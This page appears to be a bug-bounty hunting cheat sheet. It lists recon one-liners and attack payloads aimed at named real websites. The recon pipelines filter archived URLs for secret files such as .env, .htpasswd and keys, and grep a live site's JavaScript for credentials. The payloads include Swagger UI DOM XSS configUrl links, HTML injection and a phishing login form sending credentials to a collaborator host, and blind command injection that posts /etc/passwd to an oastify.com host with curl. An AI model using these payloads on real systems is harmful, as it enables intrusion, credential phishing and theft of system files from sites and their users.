Page

Find PII Data Sensitive Information Disclosure

wget -O data.txt "https://web.archive.org/cdx/search/cdx?url=*.virtualdj.com/*&output=text&fl=original&collapse=urlkey&from=" && cat data.txt | grep -E '\.xls|\.xlsx|\.json|\.sql|\.doc|\.docx|\.pptx|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5|\.exe|\.dll|\.bin|\.ini|\.bat|\.sh|\.tar|\.deb|\.git|\.env|\.rpm|\.iso|\.img|\.apk|\.msi|\.dmg|\.tmp|\.crt|\.pem|\.key|\.pub|\.asc|\.conf|\..htaccess|\.htpasswd|\.pfx|\.p12|\.swp\.old|\.temp|\.dump|\.passwd|\.shadow|\.git|\.svn|\.DS_Store|\.idea|\.vscode|\.bash_history|\.zsh_history'

curl -X GET https://en.dailypakistan.com.pk/wp-admin/js/dashboard.js | grep -i -E 'password|pwd|pass|passphrase|credentials|encryptKey|appKey|token|secret|Authorization|Key|private'

FindCVE PATH

cat data.txt | grep "secure" | grep "jspa" && cat data.txt | grep '/geoserver/ows/' && cat data.txt | grep ganglia  && cat data.txt | grep graph_all_periods.php && cat data.txt | grep "keycloak" && cat data.txt | grep "/realms/master" && cat data.txt | grep '?id='

Find All Swagger for DOM XSS

site:.worldremit.com intext:"Swagger UI" | intitle:"Swagger UI"
?url=https://jumpy-floor.surge.sh/test.yaml
?configUrl=https://raw.githubusercontent.com/VictorNS69/swagger-ui-xss/main/config.json
?configUrl=https://gist.githubusercontent.com/zenelite123/af28f9b61759b800cb65f93ae7227fb5/raw/04003a9372ac6a5077ad76aa3d20f2e76635765b/test.json

Find theHtml Injection in email via Name field while signup Process

'"/><img src=x><a href=https://evil.com>Click
<b>hello</b><h1>hacker</h1><a href=https://evil.com>hacked
<img src="https://static.wikia.nocookie.net/mrbean/images/4/4b/Mr_beans_holiday_ver2.jpg">
<h1>Congratulations you won the cash prize </h1><img src="https://play-lh.googleusercontent.com/ufXzlOQA6bwOibqQ_yBmIFaqBWOl3bbgeffwPV8z3419PWPvHZfx4Vxe98GgQ8Z7mVQ"><a href="https://evil.com"><H1><U><I>Click here to claim your reward

Email HTMLI leads to ATO

<html><body><form action="https://burpcolloborator.com">Login again for security:<br><br> <label for="u">Email id:<input type="text" id="u" name="u"><br><br><label for="p">Password:<input type="password" id="p" name="p"><br></br><input type="submit" value="Submit"></body></html>

Find theBlind Command Injection in the Signup Process

In the email field:`id`@mvlbt2ljt67qk8zv5izum3gsojuhi76w.oastify.com
in the Any POST Param:`curl -F shl=@/etc/passwd mvlbt2ljt67qk8zv5izum3gsojuhi76w.oastify.com`
curl -X POST -d @/etc/passwd http://gtd5rwjdr05ki2xp3cxokxemmdsbg34s.oastify.com

nuclei -u https://uogapply.mycampus.gla.ac.uk/ --tags tech,oracle --s info,high,critical,medium -es unknown --cloud-upload -c 30 -stats -headless

curl -X GET "https://login.rbleipzig.com/en/sso/login?apiKey=4_htVHQTXwdHjOTKV1hr61rg" | grep -i -E 'location.href|location.search|window.location|window.hash|window.location.href|location.search|location.pathname|document.URL|getparam|getUelParameter|getParameter()|parameter|innerHTML|outerHTML|document.write|document.writeln|var ='

PreviousMy Hunting Approach on Login NextFind LFI and Path Traversal

Last updated 5 months ago